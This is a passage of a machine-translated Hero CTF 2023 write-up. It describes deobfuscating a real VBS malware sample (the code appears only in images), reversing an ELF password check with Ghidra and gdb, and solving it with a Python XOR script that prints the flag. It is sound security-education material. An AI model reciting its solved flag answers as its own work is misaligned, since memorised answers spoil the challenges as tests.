{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-heroctf-2023-en","result":{"data":{"markdownRemark":{"id":"8eb407e0-41f8-5a0f-bbbb-5d9c7d0f3594","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-heroctf-2023\">original page</a>.</p>\n</blockquote>\n<p>I participated in Hero CTF 2023, which started on 5/13, as 0nePadding.</p>\n<p>My final placement was 84th out of 1085 teams.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 534px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/93b169550a47011d101863b04d518779/a07a7/image-20230517235403457.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 58.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABm0lEQVQoz5VSa08TURDtT7Cwve+76/budrcPqCkN1KCtvAJEgUBITOSbhH9FIPBFjf7Hw8zVkIhV6ofJnJmbOXNm5jaMMXhqShq0lhWWmxLJkoqYTbY0BBnntNKYV9v4LWENpNCY7BSYfuhg86AT/eu9AltnFXbO64g36D0PDmoOaeNPdRqjzTaRlXh3QgS7BfkKs+MKE8LjWcDhRQ/VII3NrX2GkFXyeIyztoNPLY1nIBIVFTEJNzXaLDAyGXdUwmA4ybH3sYvt0wpr00DqArYIb5BK7+3ihI/E7ic5e45ZmdY6qtW/yDheiJALVtdz7H/qYpcO0XuVxQOtb4d4kNBJafz/UCilhLYC7dLDv1TIC4+iZ+FzhaJ2EDKJ3+bpQeZfWSmUZYnx2hjWOPT7K2glLRShwnBliCzNMZvOkHr//MjOOTSbL/D58gr3tzfoDwb49v0Hjt4f4vKKcnfXePtmii/3X9GtOqRUkkr7b4Xc1VP3EALSLMNoNEK3rqnQIcvS+FbH2C6+QyaNeySfJMkj5nWwF0Lgb7/jAWwtTuu4uwUFAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/93b169550a47011d101863b04d518779/8ac56/image-20230517235403457.webp 240w,\n/static/93b169550a47011d101863b04d518779/d3be9/image-20230517235403457.webp 480w,\n/static/93b169550a47011d101863b04d518779/29722/image-20230517235403457.webp 534w\"\n              sizes=\"(max-width: 534px) 100vw, 534px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/93b169550a47011d101863b04d518779/8ff5a/image-20230517235403457.png 240w,\n/static/93b169550a47011d101863b04d518779/e85cb/image-20230517235403457.png 480w,\n/static/93b169550a47011d101863b04d518779/a07a7/image-20230517235403457.png 534w\"\n            sizes=\"(max-width: 534px) 100vw, 534px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/93b169550a47011d101863b04d518779/a07a7/image-20230517235403457.png\"\n            alt=\"image-20230517235403457\"\n            title=\"image-20230517235403457\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Hero CTF was a pretty unusual(?) CTF, and almost every Reverse challenge involved handling real malware samples.</p>\n<p>It was a very intense and fun CTF, so as usual I’m writing up the challenges I learned from.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#give-my-money-backrev\">Give My Money Back(Rev)</a></li>\n<li><a href=\"#scarfacerev\">Scarface(Rev)</a></li>\n<li>\n<p><a href=\"#infexionrev\">InfeXion(Rev)</a></p>\n<ul>\n<li><a href=\"#task1\">Task1</a></li>\n<li><a href=\"#task2\">Task2</a></li>\n<li><a href=\"#task3\">Task3</a></li>\n<li><a href=\"#task4\">Task4</a></li>\n</ul>\n</li>\n<li><a href=\"#hero-ransomrev\">Hero Ransom(Rev)</a></li>\n<li>\n<p><a href=\"#devcorpforensic\">dev.corp(Forensic)</a></p>\n<ul>\n<li><a href=\"#task1-1\">Task1</a></li>\n</ul>\n</li>\n<li><a href=\"#heapforensic\">Heap(Forensic)</a></li>\n<li><a href=\"#windows-stands-for-loserforensic\">Windows Stands For Loser(Forensic)</a></li>\n<li><a href=\"#openpirateosint\">OpenPirate(OSINT)</a></li>\n<li><a href=\"#pdf-messstego\">PDF-Mess(Stego)</a></li>\n<li><a href=\"#png-gstego\">PNG-G(Stego)</a></li>\n<li><a href=\"#subliminalstego\">Subliminal(Stego)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"give-my-money-backrev\" style=\"position:relative;\"><a href=\"#give-my-money-backrev\" aria-label=\"give my money backrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Give My Money Back(Rev)</h2>\n<blockquote>\n<p>Joel sat at his desk, staring at the computer screen in front of her. She had just received a strange email from an unknown sender. Joel was intrigued. She hesitated for a moment, wondering if she should open the email or not. But her curiosity got the best of her, and she clicked on the message. Your goal is to help Joel find out who stole her money!</p>\n<p>Warning : The attached archive contains real malware, do not run it on your machine! Archive password: infected</p>\n<p>The flag corresponds to the email used for the exfiltration and the name of the last exfiltrated file, e.g. Hero{attacker@evil.com|passwords.txt}.</p>\n<p>Format : Hero{email|filename}\nAuthor : xanhacks</p>\n</blockquote>\n<p>The very first challenge already involved real malware.</p>\n<p>Reading the provided sample (a VBS file), it looked like it was executing something using an obfuscated script.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6e85297bd08b9601ba44bb10c8fffff6/20f89/image-20230513091604779.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 43.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABI0lEQVQoz5WRS7KEIAxFWYhf5ONTUYEW3f/G0kkUS3v2Bqdy4YYQiBiGAYyxTN//gbU9a4pSSqS7eOrnWt66bSUI5xyEEJgY4433nlnXlb2sCdKUE4J/eZ/PBwQZJMiguG0bHMfBcd93jrSfvSd0JqV0+6SFX/2rIG3mAznx2X3e/31NzhXUKiddnZKOv/pa351e5Jx8Kb1MuHmBsO0Q04ExIRus9D8R/yfRPj5pP9iPuA7oOTeBWxcYxvEcorXXIC2IcUJjmmGaKTqYlgV6nLzsFEhtoEMUJnemP7XCiSqcqNIYNbSY13YdNDjlsihADFhonh0XI0acOhVXeHPTNJxUvCihLImCvVOfVFUFwuBBalXj7doYbJ260FDXDVJz0n/4Ak7MD7xNoG1hAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6e85297bd08b9601ba44bb10c8fffff6/8ac56/image-20230513091604779.webp 240w,\n/static/6e85297bd08b9601ba44bb10c8fffff6/d3be9/image-20230513091604779.webp 480w,\n/static/6e85297bd08b9601ba44bb10c8fffff6/e46b2/image-20230513091604779.webp 960w,\n/static/6e85297bd08b9601ba44bb10c8fffff6/68f19/image-20230513091604779.webp 1213w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6e85297bd08b9601ba44bb10c8fffff6/8ff5a/image-20230513091604779.png 240w,\n/static/6e85297bd08b9601ba44bb10c8fffff6/e85cb/image-20230513091604779.png 480w,\n/static/6e85297bd08b9601ba44bb10c8fffff6/d9199/image-20230513091604779.png 960w,\n/static/6e85297bd08b9601ba44bb10c8fffff6/20f89/image-20230513091604779.png 1213w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6e85297bd08b9601ba44bb10c8fffff6/d9199/image-20230513091604779.png\"\n            alt=\"image-20230513091604779\"\n            title=\"image-20230513091604779\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>When I removed the <code class=\"language-text\">eval</code> processing in my analysis environment and deobfuscated it, I was able to obtain the plaintext of the code executed by the malware.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 583px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2345e45c707d61001da9ab8feed8b73c/9fc4b/image-20230513093003395.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 104.58333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAABtklEQVQ4y52Uh67CMAxF8/9fxpCg7CH2Hip7Lz8d61kqUKAQyaqTkOtxfXHL5VIWi4XM53PBv16vcrvd1HT9+5+Md/v9XtzhcJDVaiXr9VoPgiv4IOpyrVZL4vG4xGIxqVarmunxeJTL5fIE/hgkzNxkMpHBYCD1el0BG42GEITzzWajbTifz2/BgnduNBpJu91WoEqlIuPxWMvHaMUj4MeSo/Ymah/dIwFhhATL+ggIAbAL7djpdNISvwG5A4SMUqkknucp0xiEhGUdCRAi8vm8FAoFBYUksv4ZkMHGXs3dt+uOZevjL2REHptvQR0Mb7db2e12qgwGmi/n1oZ3yngC9H1f+v2+yg/J4Q+HQ/2ia1oQlvUrcDedTlV2AACInjudjvrNZlPlx2xSAdnjvyPP1Wo1SSaTkslkdGyYy263K71eT4NY9gQhwGw203agcabjKUN+BFAikZBcLifFYlEHnfksl8u6T6fTks1mNSh7KiLgS0AekCWADLiBYgZoFbAnW1oR1ltHtFQqpRmSBaoxQL4E4N4y5B418c7uaZsFcPwRmFrMkF7Q6Jnd4fMGs3PGzMr/AxgEVeuulPBxAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2345e45c707d61001da9ab8feed8b73c/8ac56/image-20230513093003395.webp 240w,\n/static/2345e45c707d61001da9ab8feed8b73c/d3be9/image-20230513093003395.webp 480w,\n/static/2345e45c707d61001da9ab8feed8b73c/92613/image-20230513093003395.webp 583w\"\n              sizes=\"(max-width: 583px) 100vw, 583px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2345e45c707d61001da9ab8feed8b73c/8ff5a/image-20230513093003395.png 240w,\n/static/2345e45c707d61001da9ab8feed8b73c/e85cb/image-20230513093003395.png 480w,\n/static/2345e45c707d61001da9ab8feed8b73c/9fc4b/image-20230513093003395.png 583w\"\n            sizes=\"(max-width: 583px) 100vw, 583px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2345e45c707d61001da9ab8feed8b73c/9fc4b/image-20230513093003395.png\"\n            alt=\"image-20230513093003395\"\n            title=\"image-20230513093003395\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From there, I recovered the attacker’s email address that became the flag and the filename of the stolen confidential file, and solved the challenge.</p>\n<h2 id=\"scarfacerev\" style=\"position:relative;\"><a href=\"#scarfacerev\" aria-label=\"scarfacerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Scarface(Rev)</h2>\n<blockquote>\n<p>Maybe you can find my password… But you can’t push it to the limit like me.</p>\n<p>Format : Hero{password}\nAuthor : SoEasY</p>\n</blockquote>\n<p>This was a reversing challenge involving an ELF file rather than malware.</p>\n<p>Decompiling it with Ghidra gave the following <code class=\"language-text\">main</code> function.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">undefined8 <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  uint uVar1<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>__s<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">void</span> <span class=\"token operator\">*</span>pvVar2<span class=\"token punctuation\">;</span>\n  <span class=\"token class-name\">size_t</span> sVar3<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>__s_00<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> local_2c<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>local_28<span class=\"token punctuation\">;</span>\n  \n  __s <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token function\">malloc</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x40</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  pvVar2 <span class=\"token operator\">=</span> <span class=\"token function\">malloc</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x40</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Can you push it to the limit ? \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>__s<span class=\"token punctuation\">,</span><span class=\"token number\">0x3f</span><span class=\"token punctuation\">,</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  sVar3 <span class=\"token operator\">=</span> <span class=\"token function\">strcspn</span><span class=\"token punctuation\">(</span>__s<span class=\"token punctuation\">,</span><span class=\"token string\">\"\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  __s<span class=\"token punctuation\">[</span>sVar3<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token char\">'\\0'</span><span class=\"token punctuation\">;</span>\n  sVar3 <span class=\"token operator\">=</span> <span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>__s<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>sVar3 <span class=\"token operator\">!=</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span>local_28 <span class=\"token operator\">=</span> <span class=\"token string\">\"https://www.youtube.com/watch?v=Olgn9sXNdl0\"</span><span class=\"token punctuation\">;</span> <span class=\"token operator\">*</span>local_28 <span class=\"token operator\">!=</span> <span class=\"token char\">'='</span><span class=\"token punctuation\">;</span>\n      local_28 <span class=\"token operator\">=</span> local_28 <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token punctuation\">}</span>\n  __s_00 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token function\">UNO_REVERSE_CARD</span><span class=\"token punctuation\">(</span>local_28<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  sVar3 <span class=\"token operator\">=</span> <span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>__s_00<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  uVar1 <span class=\"token operator\">=</span> <span class=\"token function\">decode</span><span class=\"token punctuation\">(</span>__s_00<span class=\"token punctuation\">,</span>sVar3 <span class=\"token operator\">&amp;</span> <span class=\"token number\">0xffffffff</span><span class=\"token punctuation\">,</span>pvVar2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span>local_2c <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> local_2c <span class=\"token operator\">&lt;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">;</span> local_2c <span class=\"token operator\">=</span> local_2c <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>byte<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>__s<span class=\"token punctuation\">[</span>local_2c<span class=\"token punctuation\">]</span> <span class=\"token operator\">^</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>byte <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span><span class=\"token punctuation\">)</span>pvVar2 <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>ulong<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span><span class=\"token punctuation\">)</span>local_2c <span class=\"token operator\">%</span> <span class=\"token punctuation\">(</span>ulong<span class=\"token punctuation\">)</span>uVar1<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">!=</span>\n        <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>DAT_00102050<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span>local_2c<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token function\">fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Well done! You can validate with the flag Hero{%s}\\n\"</span><span class=\"token punctuation\">,</span>__s<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"(And watch a last time this : %s)\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"https://www.youtube.com/watch?v=Olgn9sXNdl0\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The code is very simple: it accepts input with the same length as <code class=\"language-text\">https://www.youtube.com/watch?v</code> (0x1f) and validates it as a password.</p>\n<p>At this point, you can see that the values used for verification are generated by the following three lines.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">__s_00 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token function\">UNO_REVERSE_CARD</span><span class=\"token punctuation\">(</span>local_28<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\nsVar3 <span class=\"token operator\">=</span> <span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>__s_00<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\nuVar1 <span class=\"token operator\">=</span> <span class=\"token function\">decode</span><span class=\"token punctuation\">(</span>__s_00<span class=\"token punctuation\">,</span>sVar3 <span class=\"token operator\">&amp;</span> <span class=\"token number\">0xffffffff</span><span class=\"token punctuation\">,</span>pvVar2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Looking at each step, none of them depend on the user’s input, and they always generate the same values.</p>\n<p>So I performed dynamic analysis with gdb, extracted the values of <code class=\"language-text\">pvVar2</code> and <code class=\"language-text\">uVar1</code>, and then used the following solver to recover the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#   __s_00 = (char *)UNO_REVERSE_CARD(i);</span>\n<span class=\"token comment\">#   sVar3 = strlen(__s_00);</span>\n<span class=\"token comment\">#   uVar1 = decode(__s_00,sVar3 &amp; 0xffffffff,pvVar2);</span>\n<span class=\"token comment\">#   for (j = 0; j &lt; 0x1f; j = j + 1) {</span>\n<span class=\"token comment\">#     if ((byte)(__s[j] ^ *(byte *)((long)pvVar2 + (ulong)(long)j % (ulong)uVar1)) !=</span>\n<span class=\"token comment\">#         (&amp;DAT_00402050)[j]) {</span>\n<span class=\"token comment\">#       fail();</span>\n<span class=\"token comment\">#     }</span>\n<span class=\"token comment\">#   }</span>\n\ns_00 <span class=\"token operator\">=</span> <span class=\"token string\">\"0ldNXs9nglO=\"</span>\nsVar3 <span class=\"token operator\">=</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>s_00<span class=\"token punctuation\">)</span>\n\nuVar1 <span class=\"token operator\">=</span> <span class=\"token number\">0x8</span>\ndecode_map <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0xd2</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x57</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x4d</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x5e</span><span class=\"token punctuation\">,</span><span class=\"token number\">0xcf</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x67</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x82</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x53</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x80</span><span class=\"token punctuation\">]</span>\nDAT_00402050 <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span> <span class=\"token number\">0x81</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x63</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x34</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x01</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x87</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x54</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xee</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xe2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x08</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x39</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x6e</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x90</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x0a</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xdb</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x0c</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xbe</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x66</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x39</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x2a</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa3</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x54</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xdd</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x15</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x80</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x66</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x7e</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x10</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x8b</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x46</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa3</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x00</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x00</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x00</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x00</span> <span class=\"token punctuation\">]</span>\nflag <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    flag <span class=\"token operator\">+=</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>DAT_00402050<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">^</span> decode_map<span class=\"token punctuation\">[</span>i<span class=\"token operator\">%</span><span class=\"token number\">8</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># S4y_H3lL0_t0_mY_l1ttl3_FR13ND!!</span></code></pre></div>\n<h2 id=\"infexionrev\" style=\"position:relative;\"><a href=\"#infexionrev\" aria-label=\"infexionrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>InfeXion(Rev)</h2>\n<p>This was a series of challenges about analyzing real malware that had been observed recently.</p>\n<p>The problem was released while the server used by the malware to download its second-stage sample was still alive.</p>\n<h3 id=\"task1\" style=\"position:relative;\"><a href=\"#task1\" aria-label=\"task1 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 